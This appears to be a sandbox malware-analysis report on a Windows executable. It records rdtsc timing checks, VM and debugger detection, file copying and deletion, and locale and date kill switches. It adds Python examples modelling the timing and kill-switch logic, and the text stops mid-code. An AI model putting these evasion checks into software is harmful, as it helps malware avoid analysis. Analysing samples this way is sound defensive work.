                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6DE8 second address: 8C6DFF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E987E411Ch 0x00000008 jno 00007F5E987E4116h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C71C4 second address: 8C71CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E9917DE26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C71CF second address: 8C721F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F5E987E4126h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e je 00007F5E987E412Ch 0x00000014 nop 0x00000015 add cl, 00000003h 0x00000018 push 0000001Eh 0x0000001a mov ecx, esi 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jg 00007F5E987E4116h 0x00000026 push edx 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7649 second address: 8C7659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7659 second address: 8C766A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E411Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C766A second address: 8C7681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7681 second address: 8C7686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A373 second address: 90A38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F5E9917DE26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A38F second address: 90A393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A6A7 second address: 90A6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA81 second address: 90AA87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA87 second address: 90AA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA8D second address: 90AAA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5E987E4116h 0x00000009 jmp 00007F5E987E411Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AC2D second address: 90AC49 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E9917DE26h 0x00000008 jnp 00007F5E9917DE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8E6 second address: 90F8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8EC second address: 90F8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8F1 second address: 90F906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E411Bh 0x00000009 jno 00007F5E987E4116h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F906 second address: 90F91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91033E second address: 910361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E987E4116h 0x0000000a popad 0x0000000b push edx 0x0000000c jnp 00007F5E987E4116h 0x00000012 jc 00007F5E987E4116h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jnc 00007F5E987E4116h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91049A second address: 9104A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9104A1 second address: 9104C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4120h 0x00000009 jmp 00007F5E987E411Eh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9104C4 second address: 9104D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5E9917DE26h 0x00000009 jnp 00007F5E9917DE26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914887 second address: 914891 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914297 second address: 9142CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E9917DE35h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F5E9917DE26h 0x00000010 jmp 00007F5E9917DE37h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9142CD second address: 9142D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A53B second address: 87A53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A53F second address: 87A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A543 second address: 87A55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E9917DE26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F5E9917DE26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A55B second address: 87A55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D1A6 second address: 91D1C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE37h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D50E second address: 91D531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E987E4129h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D685 second address: 91D69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D69A second address: 91D69F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D69F second address: 91D6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E9917DE26h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jns 00007F5E9917DE2Ch 0x00000014 jng 00007F5E9917DE2Eh 0x0000001a js 00007F5E9917DE26h 0x00000020 push edx 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5E9917DE32h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D6DD second address: 91D6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D6E1 second address: 91D6EB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E9917DE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211B8 second address: 9211BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211BE second address: 9211C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925B67 second address: 925B71 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E987E411Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E2C second address: 925E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9917DE2Bh 0x00000009 jp 00007F5E9917DE26h 0x0000000f jc 00007F5E9917DE26h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F5E9917DE38h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FB0 second address: 925FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F8C second address: 8C6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6F90 second address: 8C6F9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA76 second address: 9ADA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5E9917DE26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA82 second address: 9ADA9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5E987E411Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A2 second address: 51902A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A6 second address: 51902AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902AC second address: 51902B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902B2 second address: 51902B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902B6 second address: 51902E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c mov cx, bx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F5E9917DE33h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, C2h 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902E4 second address: 51902EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190346 second address: 519036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519036C second address: 5190371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190371 second address: 51903B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 pushfd 0x00000011 jmp 00007F5E9917DE34h 0x00000016 xor al, FFFFFF98h 0x00000019 jmp 00007F5E9917DE2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903B6 second address: 51903CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E4124h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903CE second address: 51903FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5E9917DE36h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903FE second address: 5190404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
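The listings above show the pattern a timing check of this kind relies on: two rdtsc reads a few bytes apart with filler between them (push/pop pairs, pushad/popad, short jumps that net to nothing), so that a debugger single-stepping the filler or an emulator running it slowly produces an oversized delta between the two reads, while a sandbox that hooks rdtsc can feed back forged values that keep the delta small. The Python below is an added example written for this page, not code from file.exe or from Joe Sandbox; it models the check with an injectable counter so it runs on any host, and the threshold, the FakeCounter helper and the filler loop are constructed stand-ins.

```python
"""Model of the rdtsc timing check behind the interceptor lines above.
Added example for this page; not code from file.exe or from Joe Sandbox."""
import time

# Constructed threshold: a filler of a few dozen instructions costs far fewer
# ticks than this on real hardware, and far more under a single-stepping debugger.
THRESHOLD = 50_000


def filler() -> int:
    """Stands in for the push/pop, pushad/popad and short-jump junk between
    the two rdtsc reads: it nets to nothing, it only has to take a little time."""
    acc = 0
    for i in range(64):
        acc ^= i
    return acc


def timing_delta(read_counter) -> int:
    """First rdtsc, filler, second rdtsc; the check only cares about the difference."""
    first = read_counter()
    filler()
    second = read_counter()
    return second - first


def looks_instrumented(read_counter, threshold: int = THRESHOLD) -> bool:
    """The decision: an oversized delta means the filler was stepped, paused or
    emulated, so the sample concludes it is being analysed."""
    return timing_delta(read_counter) > threshold


def hardware_counter() -> int:
    """Portable stand-in for rdtsc: a monotonic nanosecond counter."""
    return time.perf_counter_ns()


class FakeCounter:
    """A counter that advances by a fixed amount per read. With a large step it
    models a debugger single-stepping the filler; with a small constant step it
    models a sandbox that hooks rdtsc and feeds the sample forged, plausible
    values so the delta never crosses the threshold."""

    def __init__(self, step: int):
        self.value = 0
        self.step = step

    def __call__(self) -> int:
        self.value += self.step
        return self.value


if __name__ == "__main__":
    print("bare host:", looks_instrumented(hardware_counter))
    print("single-stepped:", looks_instrumented(FakeCounter(1_000_000)))
    print("rdtsc hooked:", looks_instrumented(FakeCounter(20)))
```

The design point is that the check is only as good as the counter it reads: anything that sits between the sample and the real TSC (a hypervisor trapping rdtsc, or an interceptor like the one that produced the lines above) decides what delta the sample sees.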
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 711954 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8E86A2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 949935 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1413525563.00000000011B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.1413525563.00000000011E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13652)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13655)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13667)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13675)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13707)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: pProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA
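Two of the chains above have the shape of kill switches: GetKeyboardLayoutList followed by GetLocaleInfoA (enumerate installed layouts and compare their language identifiers against a list), and GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess (parse an embedded date, convert both sides to a comparable value, exit if the current time is past it). The Python below is an added example of that decision logic with injectable inputs so it runs anywhere; it is not code recovered from file.exe, and the block list, the YYYY-MM-DD date format, the helper names and all inputs are constructed assumptions. The practical caveat is the second check: a sample with an embedded expiry exits before doing anything once the analysis VM's clock is past that date, so an early ExitProcess in a sandbox should be checked against the VM's clock before concluding the sample is inert.

```python
"""Decision logic of the shape implied by the two evasion chains above.
Added example for this page; the block list, the date format and the inputs
are constructed, not values recovered from file.exe."""
from datetime import datetime, timezone

# Windows LANGIDs for layouts a stealer might refuse to run on (constructed
# list for the example; the real list, if any, was not recovered from file.exe).
BLOCKED_LANGIDS = {0x0419: "ru-RU", 0x0422: "uk-UA", 0x0423: "be-BY", 0x043F: "kk-KZ"}


def langid_from_hkl(hkl: int) -> int:
    """GetKeyboardLayoutList fills an array of HKL handles; the low 16 bits are
    the language identifier that GetLocaleInfoA is then asked about."""
    return hkl & 0xFFFF


def blocked_layouts(hkls) -> list:
    """Locale names of every installed layout that is on the block list."""
    return [BLOCKED_LANGIDS[langid_from_hkl(h)] for h in hkls
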